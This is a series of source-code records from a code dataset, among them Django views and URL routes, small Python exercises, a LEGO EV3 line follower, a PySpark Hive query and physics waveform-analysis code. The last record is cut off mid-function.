\r\n\r\n\r\nclass Login(LoginView):\r\n form_class = LoginForm\r\n template_name = 'users/login.html'\r\n\r\n def form_valid(self, form):\r\n \"\"\"Security check complete. Log the user in.\"\"\"\r\n auth_login(self.request, form.get_user())\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n\r\nclass Logout(LoginRequiredMixin, MyLogoutView):\r\n template_name = 'users/logout.html'\r\n\r\n\r\nclass Verification(LoginRequiredMixin, TemplateView):\r\n def get(self, request):\r\n username = request.user.username\r\n\r\n # Select original image\r\n selected_vss = 1\r\n original = VssImage.objects.get(id=selected_vss)\r\n\r\n # Create vss share\r\n vss = CreateVss(settings.BASE_DIR+original.image.url)\r\n share_server_url = settings.BASE_DIR+'/media/share/server/'+username+'.png'\r\n share_user_url = settings.BASE_DIR+'/media/share/user/'+username+'.png'\r\n result_url = settings.BASE_DIR+'/media/result/'+username+'.png'\r\n vss.save_vss(share_server_url, share_user_url)\r\n vss.save_result(result_url)\r\n\r\n # Register vss share in the DB\r\n if ShareServerImage.objects.filter(username=username).exists():\r\n ShareServerImage.objects.get(username=username).delete()\r\n if ResultImage.objects.filter(username=username).exists():\r\n ResultImage.objects.get(username=username).delete()\r\n ShareServerImage.objects.create(username=username, image=share_server_url)\r\n ResultImage.objects.create(username=username, image=result_url)\r\n\r\n params = {\r\n 'form' : ImageForm(initial={ 'username' : username }),\r\n }\r\n\r\n #os.remove(share_user_url)\r\n\r\n #print(Verification.mro())\r\n\r\n return render(request, 'users/verification.html', params)\r\n\r\n def post(self, request):\r\n username = request.user.username\r\n \r\n share = ImageForm(request.POST, request.FILES)\r\n if ShareUserImage.objects.filter(username=username).exists():\r\n ShareUserImage.objects.get(username=username).delete()\r\n share.save()\r\n\r\n result_url = str(ResultImage.objects.get(username=username).image)\r\n share1_url = str(ShareServerImage.objects.get(username=username).image)\r\n share2_url = settings.BASE_DIR+'/media/'+str(ShareUserImage.objects.get(username=username).image)\r\n vss = CheckVss(result_url, share1_url, share2_url)\r\n\r\n if vss.test():\r\n self.request.user.verification = True\r\n self.request.user.save()\r\n return redirect(to='/comic')\r\n\r\n return redirect(to='users:logout')\r\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534746104","text":"\"\"\"\r\nQuestion 87 :\r\n With two given lists [1,3,6,8,35,55] and [12,24,35,24,88,120,155]\r\n write a program to make a list whose elements are intersection\r\n of the above lists.\r\n\r\n Hints : Use set() and \"&=\" to do set intersection operation.\r\n\"\"\"\r\n\r\n# Solution :\r\nfrom typing import Set\r\n\r\nset1 = set([1, 3, 6, 8, 35, 55])\r\nset2 = set([12, 24, 35, 24, 88, 120, 155])\r\n\r\nset1 &= set2\r\nli = list(set1)\r\nprint(li)\r\n\r\n\"\"\"\r\nOutput : \r\n [35]\r\n\"\"\"","sub_path":"Question-87.py","file_name":"Question-87.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136779990","text":"#import subprocess\nimport os\n\nwith open(\"ios-ads.txt\") as textfile1, open(\"android-ads.txt\") as textfile2, open(\"appNames.txt\") as textfile3, open(\"branches.txt\") as textfile4, open(\"bundle-ids.txt\") as textfile5, open(\"prevAppNames.txt\") as textfile6:\n for x, y, z, b, bun, prev in zip(textfile1, textfile2, textfile3, textfile4, textfile5, textfile6):\n x = x.strip()\n y = y.strip()\n z = z.strip()\n b = b.strip()\n bun = bun.strip()\n prev = prev.strip()\n \n cmd0 = \"echo value: \" + x + \" \" + y + \" \" + z + \" \" + b + \" \" + bun + \" \" + prev\n cmd = \"bash iosAutomationScript.sh \" + x + \" \" + y + \" \" + z + \" \" + b + \" \" + bun + \" \" + prev\n os.system(cmd0)\n os.system(cmd)\n","sub_path":"ios-automation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85910461","text":"from sikuli import *\nimport sys, os\nfrom datetime import *\nimport java.lang.System\n\nimport images as img\n\nopsys = java.lang.System.getProperty('os.name')\n \n## Current utilities path; contains util and testing)_util, and pretty much\n## everything else.\n\nframework_path = os.path.expanduser(\"~\") + \"/source_code/tools_dev/sikuli_testing\" \n\nif not framework_path in sys.path:\n sys.path.append(framework_path)\n\n## Path where the test jsons go. Defaults to just framework_path/TESTS/.\nTESTS_path = framework_path + \"/TESTS/\"\n\n## Paths for logging.\nsuite_TS = datetime.now() # CHANGE THIS.\nlog_folder = framework_path + \"/log/\"\nlog_file = log_folder + \"log.csv\"\n\n## Image and button dictionaries.\ndef make_imgDict(imglist, key_value = 0):\n \"\"\"Given a list of images in json format {#0:#1, ...}, create a dict callable by value 0 or 1.\"\"\" \n \n I = {}\n for name_img in imglist: I[name_img[key_value]] = name_img[(not key_value) & 1]\n return I\n\nimgDict = make_imgDict(img.image_list()) # Search by screen name (eg, \"memo_screen\").\nscreenDict = make_imgDict(img.image_list(), key_value = 1) # Search by screen image (eg, \"memo_screen.jpeg\"). \nbuttonDict = img.button_list()\nmiscimgDict = img.misc_images()\n\n ","sub_path":"globals.sikuli/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"338227037","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, include, url\nfrom django.core.cache import cache\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom kinger import settings\nfrom kinger.forms import KSignupForm, KChangeEmailForm, KEditProfileForm, KAuthenticationForm\n\n\n# handler404 = \"kinger.views.errors.handler404\"\nhandler500 = \"kinger.views.errors.handler500\"\n\nurlpatterns = patterns(\"kinger.views.frontend\",\n url('^index/$', \"index\", name=\"home\"),\n url('^cal/$', \"cal\", name=\"kinger_cal\"),\n# url('^axis/$', \"time_axis\", name=\"kinger_time_axis\"),\n# url('^test/$', \"test\", name=\"kinger_test\"),\n url(r'^pre/$', \"index\", name='home'),\n url('^tile/(?P\\d+)/$', \"view\", name='tile_view'),\n url('^tile/comment/(?P\\d+)/delete/$', \"delete_comment\", name='tile_delete_comment'),\n url(r'^get_user_info/$', \"get_user_info\", name=\"kinger_get_user_info\"), \n url(r'^vcar/$', \"vcar\", name=\"kinger_vcar\"),\n url(r'^unread_list/$', \"unread_list\", name=\"kinger_unread_list\"),\n url(r'^daily_record/$', \"daily_record\", name=\"kinger_daily_record\"),\n url(r'^daily_activity/(?P\\d+)/$', \"daily_activity\", name=\"kinger_daily_activity\"),\n url(r'^daily_cookbook/(?P\\d+)/$', \"daily_cookbook\", name=\"kinger_daily_cookbook\"),\n url(r'^daily_date/$', \"get_daily_by_date\", name=\"get_daily_by_date\"),\n url(r'^mark_cookbook_as_read/$', \"mark_cookbook_as_read\", name=\"kinger_mark_cookbook_as_read\"),\n url(r'^introduction/$', \"introduction\", name=\"kinger_introduction\"),\n)\n\nurlpatterns += patterns(\"kinger.views.revision\",\n url(r'^rev/$', \"edu_index\", name=\"kinger_edu_index\"),\n url(r'^$', \"edu_index\", name=\"kinger_edu_index\"),\n url('^rev/edu/$', \"life_edu\", name=\"kinger_life_edu_index\"),\n url('^rev/baby/$', \"baby_index\", name=\"kinger_baby_index\"),\n url('^rev/cal/$', \"cal\", name=\"kinger_rev_cal\"),\n url('^rev/axis/$', \"time_axis\", name=\"kinger_rev_time_axis\"),\n url('^rev/commentshow/(?P\\d+)/$', 'show_comment', name='kinger_rev_showcomment'),\n url('^rev/axis_effective_date/$', \"axis_effective_date\", name=\"kinger_rev_axis_effective_date\"),\n \n \n \n# url('^rev/test/$', \"test\", name=\"kinger_test\"),\n# url(r'^rev/$', \"edu_index\", name='home'),\n url('^rev/tile/(?P\\d+)/$', \"view\", name='rev_tile_view'),\n url('^rev/tile/comment/(?P\\d+)/delete/$', \"delete_comment\", name='rev_tile_delete_comment'),\n url(r'^rev/get_user_info/$', \"get_user_info\", name=\"kinger_rev_get_user_info\"), \n url(r'^rev/vcar/$', \"vcar\", name=\"kinger_rev_vcar\"),\n url(r'^rev/unread_list/$', \"unread_list\", name=\"kinger_rev_unread_list\"),\n url(r'^rev/daily_record/$', \"daily_record\", name=\"kinger_rev_daily_record\"),\n url(r'^rev/daily_activity/(?P\\d+)/$', \"daily_activity\", name=\"kinger_rev_daily_activity\"),\n url(r'^rev/daily_cookbook/(?P\\d+)/$', \"daily_cookbook\", name=\"kinger_rev_daily_cookbook\"),\n url(r'^rev/daily_date/$', \"get_daily_by_date\", name=\"rev_get_daily_by_date\"),\n url(r'^rev/mark_cookbook_as_read/$', \"mark_cookbook_as_read\", name=\"kinger_rev_mark_cookbook_as_read\"),\n url(r'^rev/introduction/$', \"introduction\", name=\"kinger_rev_introduction\"),\n)\n\nurlpatterns += patterns(\"kinger.views.axis\",\n url('^axis/$', \"time_axis\", name=\"kinger_time_axis\"),\n url('^axis/get_daily_baby_tiles/$', \"get_daily_baby_tiles\", name=\"kinger_axis_daily_baby_tiles\"),\n url('^axis/(?P\\d+)/$', \"tile_view\", name='axis_tile_view'),\n url('^axis_pre/(?P\\d+)/$', \"tile_view_pre\", name='axis_tile_view_pre'),\n \n url('^axis/tile_page/(?P\\d+)/$', \"tile_page\", name='axis_tile_page'),\n url('^axis/more_comment/(?P\\d+)/$', \"more_comment\", name='axis_more_comment'),\n url(r'^axis/daily_record/$', \"daily_record\", name=\"kinger_axis_daily_record\"),\n url(r'^axis/daily_activity/$', \"daily_activity\", name=\"kinger_axis_daily_activity\"),\n url(r'^axis/daily_cookbook/$', \"daily_cookbook\", name=\"kinger_axis_daily_cookbook\"),\n url('^axis/create_baby_tile/$', \"create_baby_tile\", name=\"kinger_rev_create_baby_tile\"),\n url('^axis/tile/n_comments/$', \"get_tile_n_comments\", name=\"axis_get_tile_n_comments\"),\n url('^axis/tile/delete/(?P\\d+)/$', \"delete_tile\", name=\"axis_delete_tile\"),\n url('^axis/tile/description/$', \"edit_tile_description\", name=\"axis_edit_tile_description\"),\n url('^rev/theme/$', \"theme_view\", name=\"kinger_rev_theme_view\"),\n)\n\n \n# 找回密码各项\nurlpatterns += patterns(\"kinger.views.account\",\n url(r'^accounts/pwd_back_mail/$', \"pwd_back_mail\", name=\"kinger_pwd_back_mail\"),\n url(r'^accounts/pwd_back_mail_done/$', \"pwd_back_mail_done\", name=\"kinger_pwd_back_mail_done\"),\n url(r'^accounts/pwd_back_mail_reset/(?P[0-9A-Za-z]+)-(?P.+)/$',\n 'pwd_back_mail_reset',\n name='kinger_pwd_back_mail_reset'),\n\n\n url(r'^accounts/pwd_back_mobile/$', \"pwd_back_mobile\", name=\"kinger_pwd_back_mobile\"),\n url(r'^accounts/pwd_back_mobile_get_vcode/$', \"pwd_back_mobile_get_vcode\", name=\"kinger_pwd_back_mobile_get_vcode\"),\n\n url(r'^accounts/pwd_back_pwd_reset/$', \"pwd_back_pwd_reset\", name=\"kinger_pwd_back_pwd_reset\"),\n url(r'^accounts/pwd_back_success/$', \"pwd_back_success\", name=\"kinger_pwd_back_success\"), \n)\n\nurlpatterns += patterns(\"kinger.views.cross_domain\",\n url(r'^cross_domain/login/$', \"cross_domain_login\", name='cross_domain_login'),\n url(r'^cross_domain/logout/$', \"cross_domain_logout\", name='cross_domain_logout'),\n)\n\nurlpatterns += patterns(\"kinger.views.admin.advimage\",\n url(r'^upload_image/$', \"upload_image\", name=\"upload_image\"),\n url(r'^upload_tile_image/$', \"upload_tile_image\", name=\"upload_tile_image\"),\n)\n\nurlpatterns += patterns(\"kinger.views.statistical.weixiao\",\n url(r'^statistical/$', \"index\", name=\"statistical_index\"), \n url(r'^statistical/group_teacher/$', \"group_teacher\", name=\"statistical_group_teacher\"),\n url(r'^statistical/school_group/$', \"school_group\", name=\"statistical_school_group\"),\n url(r'^statistical/school_student/$', \"school_student\", name=\"statistical_school_student\"),\n url(r'^statistical/tile_visit/$', \"student_tile_visit\", name=\"statistical_tile_visit\"),\n url(r'^statistical/page_request_time/$', \"page_request_time\", name=\"statistical_page_request_time\"),\n)\n\nurlpatterns += patterns(\"kinger.views.ykauth\",\n url(r'^YKAuth.txt/$', \"index\", name=\"ykauth\"),\n)\n\nurlpatterns += patterns('',\n \n url(r'^admin/', include('kinger.views.admin.urls')),\n url(r'^admin/', include(admin.site.urls)),\n (r'^grappelli/', include('grappelli.urls')),\n # # Edit profile\n url(r'^accounts/(?P[\\.\\w]+)/edit/$',\n \"userena.views.profile_edit\", {'edit_profile_form': KEditProfileForm},\n name='userena_profile_edit'),\n url(r'^account_setting/$', 'userena.views.account_setting', name=\"userena_account_setting\"),\n url(r'^accounts/signup/$',\n \"userena.views.signup\", {'signup_form': KSignupForm},\n name='userena_signup'),\n # Change email and confirm it\n url(r'^accounts/(?P[\\.\\w]+)/email/$',\n \"userena.views.email_change\", {\"email_form\": KChangeEmailForm},\n name='userena_email_change'),\n url(r'^accounts/signin/$',\n \"userena.views.signin\", {\"auth_form\": KAuthenticationForm},\n name='userena_signin'),\n (r'^accounts/', include('userena.urls')),\n (r'^comments/', include('django.contrib.comments.urls')),\n (r'^manage/', include('manage.urls')),\n\n # 专家问答\n (r'^aq/', include('aq.urls')),\n\n # 客服问答\n (r'^waiter/', include('waiter.urls')),\n\n # 短信相关\n (r'^sms/', include('sms.urls')),\n \n #oa\n (r'^oa/', include('oa.urls')),\n (r'^supply/', include('oa.supply.urls')),\n# (r'^oa/site/', include('oa.views.site.urls')),\n\n (r'^growth/', include('kinger.growth.urls')),\n # 站内提醒\n ('^notification/', include('notifications.urls',namespace='notifications')),\n\n (r'^photologue/', include('photologue.urls')),\n url(r'^like/', include('likeable.urls')),\n\n\n #(r'^messages/', include('userena.contrib.umessages.urls')),\n\n #url(r'^message/(?P\\d+)/delete/$', \"kinger.views.message.message_delete\", name='userena_umessages_delete'),\n\n (r'^client/', include('kinger.apps.client.urls')),\n (r'^oauth2/', include('kinger.apps.oauth2.urls')),\n (r'^api/v1/', include('api.urls',app_name='api')),\n (r'^api/v2/', include('apiv2.urls',app_name='apiv2')),\n\n (r'^backend/', include('backend.urls')),\n\n (r'^favicon\\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/_static/img/favicon.ico'}),\n\n)\n\nurlpatterns += patterns(\"kinger.views.message\",\n url(r'^messages/$',\n \"message_list\",\n name='userena_umessages_list'),\n \n url(r'^message/history/(?P\\d+)/$',\n \"user_message_history\",\n name='user_umessages_history'),\n \n url(r'^message/history/(?P[\\.\\w]+)/$',\n \"message_history\",\n name='userena_umessages_history'),\n \n url(r'^message/quick_contact/$',\n \"message_quick_contact\",\n name='userena_umessages_quick_contact'),\n\n url(r'^message/remove/$',\n \"message_remove\",\n name='userena_umessages_remove'),\n\n url(r'^message/contact_remove/(?P[\\.\\w]+)$',\n \"contact_remove\",\n name='userena_umessages_contact_remove'),\n)\n\nurlpatterns += patterns('',\n url(r'^captcha/', include('captcha.urls')),\n)\n\nurlpatterns += patterns('kinger.views.test',\n url(r'^tests/', 'test'),\n)\n\nurlpatterns += patterns('',\n url(r'^site_file/(?P.*)$','django.views.static.serve',{'document_root':settings.FILE_PATH}),\n)\n\nurlpatterns += patterns('',\n # media 目录\n url(r'^%s(?P.*)$' % settings.MEDIA_URL[1:],\n 'django.views.static.serve', {\"document_root\": settings.MEDIA_ROOT}),\n)\n\nurlpatterns += patterns('',\n # media 目录\n url(r'^%s(?P.*)$' % settings.STATIC_URL[1:],\n 'django.views.static.serve', {\"document_root\": settings.STATIC_ROOT}),\n)\n\nurlpatterns += patterns('',\n url(r'^oa/site/', include('oa.views.site.urls')),\n url(r'^(?P[\\.\\w]+)/', include('oa.views.site.urls')),\n)\n\nif settings.DEBUG is False:\n urlpatterns += patterns('django.contrib.staticfiles.views',\n url(r'^static/(?P.*)$', 'serve'),\n )\n","sub_path":"kinger/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":10731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641786048","text":"#!/usr/bin/env pybricks-micropythonimport time\nfrom pybricks.ev3devices import Motor, ColorSensor\nfrom pybricks.parameters import Port, Stop\nfrom pybricks.tools import wait\nfrom pybricks.robotics import DriveBase\n\n\n# Initialize the motors.\nleft_motor = Motor(Port.B)\nright_motor = Motor(Port.C)\n\n# Initialize the color sensor.\nline_sensor = ColorSensor(Port.S1)\nline_sensor2 = ColorSensor(Port.S4)\n\n# Initialize the drive base.\nrobot = DriveBase(left_motor, right_motor, wheel_diameter=55.5, axle_track=104)\n\n# Calculate the light threshold. Choose values based on your measurements.\nBLACK = 9\nWHITE = 85\nthreshold = (BLACK + WHITE) / 2\n\n# Set the drive speed at 100 millimeters per second.\nDRIVE_SPEED = 160\n\n# Set the gain of the proportional line controller. This means that for every\n# percentage point of light deviating from the threshold, we set the turn\n# rate of the drivebase to 1.2 degrees per second.\n\n# For example, if the light value deviates from the threshold by 10, the robot\n# steers at 10*1.2 = 12 degrees per second.\nPROPORTIONAL_GAIN = 1.2\n\n# Start following the line endlessly.\nwhile True:\n # Calculate the deviation from the threshold.\n deviation = line_sensor.reflection() - threshold\n\n # Calculate the turn rate.\n turn_rate = PROPORTIONAL_GAIN * deviation\n\n # Set the drive base speed and turn rate.\n robot.drive(DRIVE_SPEED, turn_rate)\n\n if (line_sensor2.reflection() < 12):\n start_time = time.time()\n seconds = 1\n while True:\n current_time = time.time()\n elapsed_time = current_time - start_time\n robot.drive(DRIVE_SPEED, 0)\n if elapsed_time > seconds:\n break \n\n\n # You can wait for a short time or do other things in this loop.\n wait(10) \n","sub_path":"Lego/Oving 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487361885","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n提交脚本之前,设置环境变量:\nexport PYTHONIOENCODING=utf8\n\"\"\"\n\nfrom os.path import expanduser, join, abspath\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import Row\n\nimport platform \nprint(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaa\")\nprint(platform.python_version() )\n\n# warehouse_location points to the default location for managed databases and tables\nwarehouse_location = abspath('spark-warehouse')\n\nspark = SparkSession \\\n .builder \\\n .appName(\"Python Spark SQL Hive integration example\") \\\n .config(\"spark.sql.warehouse.dir\", warehouse_location) \\\n .enableHiveSupport() \\\n .getOrCreate()\n\nlog4jLogger = spark._jvm.org.apache.log4j\nLOGGER = log4jLogger.LogManager.getLogger(__name__)\nLOGGER.info(\"pyspark script logger initialized\")\n\n\ndf = spark.sql('''\n\t select f.filter\n\t from user_ab_log_par a\n\t lateral view json_tuple(a.i, 'data') b as data\n\t lateral view json_tuple(b.data, 'skmrMsg') c as skmrMsg\n\t lateral view json_tuple(c.skmrMsg, 'req') d as req\n\t lateral view json_tuple(d.req, 'skmrSearchHouseReq') e as skmrSearchHouseReq\n\t lateral view json_tuple(e.skmrSearchHouseReq, 'filter') f as filter\n\n\t where a.dates>=\"2018-09-01\"\n\t and a.dates<=\"2018-09-19\"\n\t and f.filter is not null\n\t and a.`__source__` = 1\n\t and a.`__topic__` = 3\n\t and a.t=28000\n\t''')\n\ndef get_keys(value):\n\n find_keys = []\n keys = [\"ONLY_FIVE\", \"ONLY_TWO\", \"SELL_QUICK\", \"EDUCATION\", \"SUBWAY_NEAR\", \"FURNISH\", \"EASEMENT\",\n \"ELECTRIC\", \"NEW_FURNISH\", \"LIFEHOOD\"\n ]\n \n for key in keys:\n if key in str(value):\n find_keys.append(key)\n return find_keys\n\nrdd2 = df.rdd.flatMap(get_keys).map(lambda x: (x, 1)).countByKey()\n\nfor k,v in rdd2.items():\n print(\"%s=%s\" %(k,v ))\n\n\n\n\n","sub_path":"spark/demo6-spark-hive-sql.py","file_name":"demo6-spark-hive-sql.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204252080","text":"# Merge two sorted linked lists and return it as a new list. \n# The new list should be made by splicing together the nodes of the first two lists.\n\n# Example:\n# Input: 1->2->4, 1->3->4\n# Output: 1->1->2->3->4->4\n\n# Runtime: 44 ms, faster than 8.21% of Python3 online submissions for Merge Two Sorted Lists.\n# Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Merge Two Sorted Lists.\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n mergeRoot = ListNode(0)\n ptr = mergeRoot\n cur_l1 = l1\n cur_l2 = l2\n\n while True:\n if (not cur_l1) and (not cur_l2):\n break\n elif not cur_l1:\n while cur_l2:\n ptr.next = ListNode(cur_l2.val)\n ptr = ptr.next\n cur_l2 = cur_l2.next\n break\n elif not cur_l2:\n while cur_l1:\n ptr.next = ListNode(cur_l1.val)\n ptr = ptr.next\n cur_l1 = cur_l1.next\n break\n\n if cur_l1.val <= cur_l2.val:\n ptr.next = ListNode(cur_l1.val)\n ptr = ptr.next\n cur_l1 = cur_l1.next\n else:\n ptr.next = ListNode(cur_l2.val)\n ptr = ptr.next\n cur_l2 = cur_l2.next\n\n ptr = mergeRoot.next\n return ptr\n\ndef stringToListNode(numbers):\n # Now convert that list into linked list\n dummyRoot = ListNode(0)\n ptr = dummyRoot\n for number in numbers:\n ptr.next = ListNode(number)\n ptr = ptr.next\n\n ptr = dummyRoot.next\n return ptr\n\ndef listNodeToString(node):\n if not node:\n return \"[]\"\n\n result = \"\"\n while node:\n result += str(node.val) + \", \"\n node = node.next\n return \"[\" + result[:-2] + \"]\"\n\ns1 = [1,2,4]\ns2 = [1,3,4]\nl1 = stringToListNode(s1)\nl2 = stringToListNode(s2)\n\nret = Solution().mergeTwoLists(l1, l2)\nout = listNodeToString(ret)\nprint(out)","sub_path":"Algorithm/Easy/21-Merge-Two-Sorted-Lists.py","file_name":"21-Merge-Two-Sorted-Lists.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429324496","text":"import subprocess\n\n\ndef resize_image(input_path, output_path, width, height):\n size = \"%dx%d\" % (width, height)\n return subprocess.call([\n \"convert\",\n input_path,\n \"-thumbnail\",\n # the > below means don't enlarge images that fit in the box\n size + \">\",\n \"-background\",\n \"transparent\",\n \"-gravity\",\n \"center\",\n # fill the box with the background color (which\n # is transparent)\n \"-extent\",\n size,\n output_path\n ])\n","sub_path":"hotline/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460079084","text":"import numpy as np\nimport uproot\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import norm,poisson,expon,chisquare\nfrom scipy import integrate\nimport awkward as awk\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 15, 11\nimport collections\n\nClockDDC10 = 6e8\nadccperVolt = 8192\nresistance_ohm = 50\nsampleWidth_ns = 10\n\ndef ReadDDC10_BinWave(fName, doTime=True):\n waveInfo = {}\n with open(fName+'.bin','rb') as fp:\n try:\n Header = np.fromfile(fp,dtype=np.uint32,count=4)\n\n waveInfo['numEvents'] = int(Header[0])\n waveInfo['numSamples'] = int(Header[1])\n waveInfo['chMap'] = np.array([1 if digit=='1' else 0 for digit in bin(Header[2])[2:]])\n waveInfo['numChan'] = np.sum(waveInfo['chMap'])\n waveInfo['file'] = fName\n byteOrderPattern = hex(int(np.fromfile(fp,dtype=np.uint32,count=1)))\n print(waveInfo)\n except ValueError as e:\n print(e)\n return None\n \n try:\n waveArr = np.empty((waveInfo['numEvents']*waveInfo['numChan']*(waveInfo['numSamples']+6)),dtype=np.int16)\n waveArr[:-2] = np.fromfile(fp,dtype=np.int16)\n except ValueError as e:\n print(e)\n return None\n \n waveArr = np.reshape(waveArr.astype(dtype=np.float64)/adccperVolt,(waveInfo['numEvents'],waveInfo['numChan'],(waveInfo['numSamples']+6)))[...,2:-4]\n\n if doTime:\n with open(fName+'.log','r') as fl:\n waveInfo['liveTimes_s'] = np.loadtxt(fl,delimiter=',',skiprows=5,max_rows=waveInfo['numEvents'],usecols=(2),dtype=np.float64)/(ClockDDC10)\n waveInfo['totliveTime_s'] = np.sum(waveInfo['liveTimes_s'])\n \n return [waveArr,waveInfo]\n\n\ndef Subtract_Baseline(waveArr,nBase=50):\n baseWave = waveArr[...,:nBase]\n sumax = len(waveArr.shape)-1\n waveBaseline = np.sum(baseWave,axis = sumax)/nBase\n waveBaserms = np.sqrt(np.sum(baseWave*baseWave,axis = sumax)/nBase - waveBaseline*waveBaseline)\n subtwaveArr = waveArr - waveBaseline[...,np.newaxis]\n \n return subtwaveArr,(waveBaseline,waveBaserms)\n\nfrom collections.abc import Iterable\ndef winQHist(wave,ch,init=175,end=250,nBins=10000,hrange=None,sub=False,evMask=True,nBase=50,doLive=True,binW=0):\n if sub:\n wave[0],baseD = Subtract_Baseline(wave[0],nBase)\n sumax = len(wave[0][:,ch,:].shape)-1\n wmask=1\n if isinstance(init,Iterable):\n wmask1 = np.indices(wave[0][:,ch].shape)[1]>init[...,np.newaxis]\n wmask *= wmask1\n else:\n wmask1 = np.indices(wave[0][:,ch].shape)[1]>init\n wmask *= wmask1\n if isinstance(end,Iterable): \n wmask1 = np.indices(wave[0][:,ch].shape)[1]0:\n nBins = int(bRange/binW)\n tmpQ = list(np.histogram(qArr,bins=nBins,range=hrange))\n tmpQ[0] = tmpQ[0].astype(float)\n bWidth = (tmpQ[1][-1] - tmpQ[1][0])/float(nBins)\n bTot = tmpQ[0].sum()\n bNorm = bTot*bWidth\n tmpQ[1] = (tmpQ[1][1:]+tmpQ[1][:-1])/2.0\n tmpQ.append(tmpQ[0]*np.square(1.0/bNorm))\n tmpQ[0] *= 1.0/bNorm\n if doLive:\n tmpQ[0] *= bTot/float(wave[1]['totliveTime_s'])\n tmpQ[2] *= np.square(bTot/float(wave[1]['totliveTime_s']))\n tmpQ.append(np.nonzero(tmpQ[2])[0])\n \n ret['qHist'] = list(tmpQ)\n return ret\n\nimport matplotlib as mpl\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 15, 11\nmpl.rc('axes.formatter', useoffset=False)\ndef peakHist(waveArr,chan=0,yrange=None,yscale=1,ret=False,doplot=True):\n peakT = np.argmax(waveArr[0][:,chan,:],axis=1)\n peakV = waveArr[0][np.arange(0,waveArr[1]['numEvents']),chan,peakT]*1e3\n pHist = np.histogram2d(peakT,peakV,bins=[waveArr[1]['numSamples'],int(adccperVolt/yscale)])\n if doplot:\n plt.pcolormesh(pHist[1][:-1],pHist[2][:-1],np.transpose(pHist[0])/waveArr[1]['totliveTime_s'],norm=mpl.colors.LogNorm())\n cbar = plt.colorbar()\n plt.xlabel(\"peak Time (samples)\")\n plt.ylabel(\"peak Amplitude (mV)\")\n if isinstance(yrange,(tuple,list)):\n plt.ylim(yrange)\n maxT = np.argmax(np.sum(pHist[0],axis=1))\n plt.xlim(pHist[1][maxT]-100,pHist[1][maxT]+100)\n plt.show()\n plt.plot(pHist[1][:-1],np.sum(pHist[0],axis=1))\n plt.yscale('log')\n plt.xlabel(\"peak Time (samples)\")\n plt.show()\n plt.plot(pHist[2][:-1],np.sum(pHist[0],axis=0))\n plt.yscale('log')\n plt.xlabel(\"peak Amplitude (mV)\")\n plt.show()\n if ret:\n return pHist,peakT,peakV\n else:\n return pHist\n\ndef plotWaves(waveArr,chan=0,nWaves=100):\n plt.figure()\n for i in range(min(nWaves,len(waveArr))):\n plt.plot(waveArr[i,chan,:],marker='+')\n plt.xlabel('samples (10ns)')\n plt.ylabel('V')\n plt.show()\n return plt.gcf()\n\ndef gpn(q,n,q0,q1,s0,s1,u):\n if n==0:\n return norm.pdf(q,q0,np.abs(s0))*float(poisson.pmf(0,u))\n else:\n sn = s0*s0 + (n*s1*s1)\n gan = norm.pdf(q,q0+n*q1,np.sqrt(sn))*float(poisson.pmf(n,u))\n return gan+gpn(q,n-1,q0,q1,s0,s1,u)\ndef gpn2(q,n,q0,q1,s0,s1,u,Na=1):\n return Na*gpn(q,n,q0,q1,s0,s1,u)\n\ndef g2(q,q0,q1,s0,s1):\n\t\treturn norm.pdf(q,q0,np.abs(s0)) + norm.pdf(q,q1,np.abs(s1))\n\ndef fitQ(Qhist,P,doErr=False,dof=0):\n P = collections.OrderedDict(P)\n \n ng = len(P)\n mx = Qhist[1]\n mN = Qhist[0].sum()*(mx[1]-mx[0])\n my = Qhist[0]/mN\n merr = None\n abSig = None\n if doErr:\n args = Qhist[3]\n mx = mx[args]\n my = my[args]\n merr = np.sqrt(Qhist[2][args]/(mN*mN))\n abSig = True\n lambdg = lambda q,q0,q1,s0,s1: g2(q,q0,q1,s0,s1)\n \n fit,tmp = curve_fit(lambdg,mx,my,p0=list(P.values()),bounds=([-1,0,0,0],np.inf),sigma=merr,absolute_sigma=abSig,maxfev=10000,ftol=1e-8,gtol=1e-8)\n mchi2 = chisquare(my,g2(mx,*fit),ddof=dof)\n #print(fit)\n params = P.copy()\n params.update(zip(params,fit))\n paramerr = params.copy()\n paramerr.update(zip(paramerr,np.diag(tmp)))\n params['chi2'] = mchi2\n params['norm'] = mN\n return params,paramerr\n\ndef 